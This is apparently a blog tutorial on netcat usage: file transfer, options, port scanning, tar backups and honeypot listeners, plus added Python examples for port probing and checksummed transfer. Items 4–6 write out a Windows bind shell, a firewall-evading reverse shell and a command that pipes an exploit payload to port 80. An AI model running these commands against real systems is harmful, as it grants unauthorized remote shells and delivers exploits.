Today, while browsing around, I saw a post about using nc under Linux to transfer files, and learned a bit from it.
Sending side:
cat test.txt | nc -l -p 6666
or nc -l -p 6666 < test.txt
(Some nc versions do not accept -p together with -l; on those use nc -l 6666.)
"Listening on port 6666, waiting for connection" (assume the sending side's IP is 10.20.133.152).
Receiving end:
nc 10.20.133.152 6666 > test1.txt
This transfers test.txt from the sender to the receiving end, where it is saved as test1.txt. Note that the listening side hands the file, in the clear, to whoever connects first, and nothing checks that every byte arrived: compare checksums on both ends afterwards (sha256sum test.txt on the sender, sha256sum test1.txt on the receiver).
To connect somewhere: nc [-options] hostname port[s] [ports] ...
To bind a port and wait for a connection: nc -l -p port [-options] [hostname] [port]
Syntax: nc [-hlnruz] [-g<gateway ...>] [-G<pointer>] [-i<delay seconds>] [-o<output file>] [-p<local port>] [-s<source address>] [-v ...] [-w<timeout seconds>] [hostname] [port ...]
Additional note: the -g and -G options set IP loose-source-routing options on the packets nc sends (the "router" settings the original help text refers to); most networks drop source-routed packets today.
Parameters
-g<gateway>  Source-routing hop point(s); up to 8 may be given.
-G<pointer>  Source-routing pointer, a multiple of 4 (4, 8, 12, ...).
-h  Online help.
-i<delay seconds>  Delay interval between lines sent and between ports scanned.
-l  Listen mode, for inbound connections.
-n  Numeric-only IP addresses, no DNS lookups.
-o<output file>  Hex dump of the transferred data to the given file.
-p<port>  Local port number to use.
-r  Randomize local and remote ports.
-s<source address>  Local source address to send packets from.
-u  UDP mode.
-v  Verbose: shows what the command is doing.
-w<timeout seconds>  Timeout for connects (and final network reads).
-z  Zero-I/O mode, used only for port scanning.
In addition, nc can be used for port scanning:
nc -v -z -w2 10.20.133.152 1-14000
scans TCP ports 1 to 14000 on host 10.20.133.152;
nc -u -v -z -w2 10.20.133.152 1-14000
scans UDP ports 1 to 14000 on the same host. Treat the UDP results with care: UDP has no handshake, so nc cannot tell an open port from a filtered one, and any port that does not answer with an ICMP port-unreachable is reported as open.
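To make the open/closed/filtered distinction explicit, here is an added example (not code from the original post) that re-implements in Python what each nc -z probe does: a full TCP connect followed by an immediate close, and for -u an empty datagram followed by a wait for ICMP. All function names are this example's own; the loopback listener it scans is constructed inside the script so it runs offline.

```python
# Added example: the per-port probe behind "nc -z -w<secs>" and "nc -u -z",
# written out in Python so the three possible outcomes are visible.
import socket
from contextlib import closing


def parse_ports(spec: str) -> list:
    """Expand an nc-style port spec such as '80', '80-445' or '22,80-90'."""
    ports = []
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        lo_i = int(lo)
        hi_i = int(hi) if hi else lo_i
        if not 0 < lo_i <= hi_i <= 65535:
            raise ValueError("bad port spec: %r" % part)
        ports.extend(range(lo_i, hi_i + 1))
    return ports


def tcp_probe(host: str, port: int, timeout: float = 2.0) -> str:
    """One 'nc -z -w<timeout>' probe: full TCP connect, then close without I/O.

    'open'     - the handshake completed, something is listening
    'closed'   - the host answered with RST (connection refused)
    'filtered' - nothing answered before the timeout (firewall or drop)
    """
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            return "closed"
        except OSError:  # timeout, EHOSTUNREACH, ...
            return "filtered"
    return "open"


def udp_probe(host: str, port: int, timeout: float = 2.0) -> str:
    """One 'nc -u -z' probe. The only positive evidence UDP can give is an
    ICMP port-unreachable, which Linux surfaces as ECONNREFUSED on a connected
    UDP socket. Silence proves nothing, so it is reported as 'open|filtered';
    nc itself simply lists such ports as open."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        try:
            s.send(b"")  # zero-length datagram, like nc -z
            s.recv(1)
            return "open"  # an actual reply to an empty probe is rare
        except ConnectionRefusedError:
            return "closed"
        except OSError:  # timeout: no ICMP came back
            return "open|filtered"


def scan(host: str, spec: str, timeout: float = 2.0, udp: bool = False) -> dict:
    """Equivalent of 'nc [-u] -v -z -w<timeout> host spec': maps port -> state."""
    probe = udp_probe if udp else tcp_probe
    return {p: probe(host, p, timeout) for p in parse_ports(spec)}


def open_listener(udp: bool = False):
    """Constructed scan target: a loopback socket on an OS-chosen port.
    Returns (socket, port); the caller closes the socket."""
    kind = socket.SOCK_DGRAM if udp else socket.SOCK_STREAM
    s = socket.socket(socket.AF_INET, kind)
    s.bind(("127.0.0.1", 0))
    if not udp:
        s.listen(5)
    return s, s.getsockname()[1]


def reserve_closed_port() -> int:
    """Ask the OS for a port and release it again, so nothing listens there."""
    s, port = open_listener()
    s.close()
    return port


if __name__ == "__main__":
    srv, port = open_listener()
    report = scan("127.0.0.1", "%d-%d" % (port, port + 2), timeout=1.0)
    for p, state in sorted(report.items()):
        print("127.0.0.1 %d %s" % (p, state))  # only the first port is 'open'
    srv.close()
```

Run it against a real host with scan("10.20.133.152", "1-14000") and compare with nc's output: the TCP column will agree, while the UDP column shows how little a silent UDP port actually tells you.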
nc is a very good network probing tool; the detailed usage follows.
'nc.exe -h' shows how each parameter is used.
Basic format: nc [-options] hostname port [ports] ...
nc -l -p port [options] [hostname] [port]
-d  Detach from the console (background mode)
-e prog  Program to execute once a connection arrives [dangerous!!]
-g gateway  Source-routing hop point(s), up to 8
-G num  Source-routing pointer: 4, 8, 12, ...
-h  Help information
-i secs  Delay interval for lines sent and ports scanned
-l  Listen mode, for inbound connections
-L  Listen harder: re-listen after the connection is closed
-n  Numeric-only IP addresses, no DNS; hostnames cannot be used
-o file  Hex dump of the traffic to file
-p port  Local port number
-r  Randomize local and remote ports
-s addr  Local source address
-t  Answer telnet negotiation (interactive telnet mode)
-u  UDP mode
-v  Verbose output; use -v twice for more detail
-w secs  Timeout for connects and final net reads
-z  Zero-I/O mode, used for scanning
A port can be given as a range in the form m-n.
1) Connect to a remote host
Format: nc -nvv 192.168.x.x 80
Explanation: connects to TCP port 80 of 192.168.x.x
2) Listen on the local host
Format: nc -l -p 80
Explanation: listens on TCP port 80 of this machine
3) Scan a remote host
Format: nc -nvv -w2 -z 192.168.x.x 80-445
Explanation: scans all TCP ports from 80 to 445 on 192.168.x.x
4) Bind a shell on the remote host, example:
Format: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
Explanation: binds the remote host's cmd shell to its own TCP port 5354 (a bind shell); whoever connects to that port gets the shell, with no authentication at all
5) Bind a shell on the remote host and connect back (reverse shell), example:
Format: nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
Explanation: attaches the remote host's cmd shell to an outbound connection to 192.168.x.x TCP port 5354, where the other side waits with nc -l -p 5354; because the connection is outbound from the victim, it gets through firewalls that block inbound connections but allow outbound ones
These are the most basic uses (in fact nc has many more: combined with the pipe "|" and the redirection operators "<" and ">" it becomes far more powerful...).
6) Attack use, example:
Format 1: type.exe c:\exploit.txt | nc -nvv 192.168.x.x 80
Format 2: nc -nvv 192.168.x.x 80 < c:\exploit.txt
Explanation: connects to port 80 of 192.168.x.x and sends the contents of 'c:\exploit.txt' down the connection (the two formats have the same effect, just as in the file-transfer example)
Note: 'c:\exploit.txt' holds the shellcode or other payload.
7) Honeypot use [1], example:
Format: nc -L -p 80
Explanation: with '-L' (note: uppercase L) nc keeps listening on the port, re-listening after each connection closes, until Ctrl+C
8) Honeypot use [2], example:
Format: nc -L -p 80 > c:\log.txt
Explanation: '-L' keeps listening on the port until Ctrl+C, and whatever connecting clients send is written to 'c:\log.txt'; change '>' to '>>' to append to the log instead of overwriting it
Note: 'c:\log.txt' is the log file.
9) Honeypot use [3], example:
Format 1: nc -L -p 80 < c:\honeypot.txt
Format 2: type.exe c:\honeypot.txt | nc -L -p 80
Explanation: '-L' keeps listening on the port until Ctrl+C and 'sends' the contents of 'c:\honeypot.txt' (a fake service banner, for instance) to the client that connects!
10) Backup archive
Back up a folder on host A to backup.tgz on host B.
Source host A: tar czf - work | nc -l -c -p 1234
Destination host B: nc 192.168.0.1 1234 > a.tgz
Or:
A: tar -zcf - data | nc -l -p 4444
B: nc a 4444 > backup.tgz   (here "a" is host A's hostname)
After the transfer, press Ctrl+C to break the connection. This way no intermediate file is created on host A: the archive streams straight into backup.tgz on B. The drawback is that you cannot tell when the transfer has finished, because the listener does not close by itself once tar reaches end of file. The -c in the first form (GNU netcat) closes the connection on EOF from stdin; the OpenBSD nc has -N and the traditional nc has -q 1 for the same purpose, and with any of these the receiving nc exits on its own. Whichever form you use, compare checksums on both sides before trusting the backup, and remember that the listener serves the archive to the first host that connects.
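The file-transfer recipe at the top of the post and this backup recipe share the same two gaps: the receiver has no end-of-file signal (hence the Ctrl+C), and nobody checks integrity. The following added example (Python written for this page, not the original post's commands) re-implements the nc listener/connector pair on loopback with both gaps closed: the sender calls shutdown(SHUT_WR) after the last byte, which is exactly the FIN that -c/-N/-q would send, the receiver reads until that EOF, accepts only one connection and only from an allowed peer, and both sides hash what they moved. The sample file, the Receiver class and the helper names are all constructed for the example.

```python
# Added example: "nc -l -p port > file" and "nc host port < file", reimplemented
# with an explicit EOF, a peer check and a SHA-256 on both ends.
import hashlib
import os
import socket
import tempfile
import threading

CHUNK = 65536


def send_file(host: str, port: int, path: str) -> str:
    """Sender side ('nc host port < file'). After the last byte it half-closes
    the socket; the resulting FIN is the EOF the receiver waits for, which is
    what pressing Ctrl+C stands in for in the tar recipe. Returns the digest."""
    h = hashlib.sha256()
    with socket.create_connection((host, port), timeout=10) as s, open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
            s.sendall(chunk)
        s.shutdown(socket.SHUT_WR)  # "no more data", unlike a plain nc listener
    return h.hexdigest()


class Receiver:
    """Receiver side ('nc -l -p port > file'). Unlike nc it accepts exactly one
    connection, only from allowed_peer, and stops at the sender's EOF."""

    def __init__(self, dest: str, allowed_peer: str = "127.0.0.1"):
        self.dest = dest
        self.allowed_peer = allowed_peer
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))  # port 0: let the OS pick one
        self.sock.listen(1)
        self.sock.settimeout(30)
        self.port = self.sock.getsockname()[1]
        self.digest = None
        self.rejected = []

    def serve_once(self) -> str:
        while True:
            conn, (peer, _) = self.sock.accept()
            if peer == self.allowed_peer:
                break
            self.rejected.append(peer)  # a plain nc would have served them
            conn.close()
        h = hashlib.sha256()
        with conn, open(self.dest, "wb") as out:
            conn.settimeout(30)
            while True:
                chunk = conn.recv(CHUNK)
                if not chunk:  # b"" means the peer sent FIN: transfer complete
                    break
                out.write(chunk)
                h.update(chunk)
        self.sock.close()
        self.digest = h.hexdigest()
        return self.digest


def transfer(src: str, dest: str) -> tuple:
    """Run both sides on loopback; returns (sender_digest, receiver_digest)."""
    rx = Receiver(dest)
    t = threading.Thread(target=rx.serve_once)
    t.start()
    sent = send_file("127.0.0.1", rx.port, src)
    t.join()
    return sent, rx.digest


def run_demo(size: int = 3 * 1024 * 1024) -> dict:
    """Round-trip a constructed sample file (random bytes standing in for
    test.txt / backup.tgz) and report both digests and the bytes written."""
    d = tempfile.mkdtemp()
    src = os.path.join(d, "test.txt")
    dst = os.path.join(d, "test1.txt")
    with open(src, "wb") as f:
        f.write(os.urandom(size))
    sent, got = transfer(src, dst)
    return {"sent": sent, "received": got, "bytes": os.path.getsize(dst)}


if __name__ == "__main__":
    r = run_demo()
    print("sender   sha256:", r["sent"])
    print("receiver sha256:", r["received"])
    print("match" if r["sent"] == r["received"] else "MISMATCH")
```

Sending large files hits the usual things a checksum catches (truncation when the connection drops, a wrong file redirected in); the peer check is the part nc never gives you, since `nc -l` serves whoever gets there first.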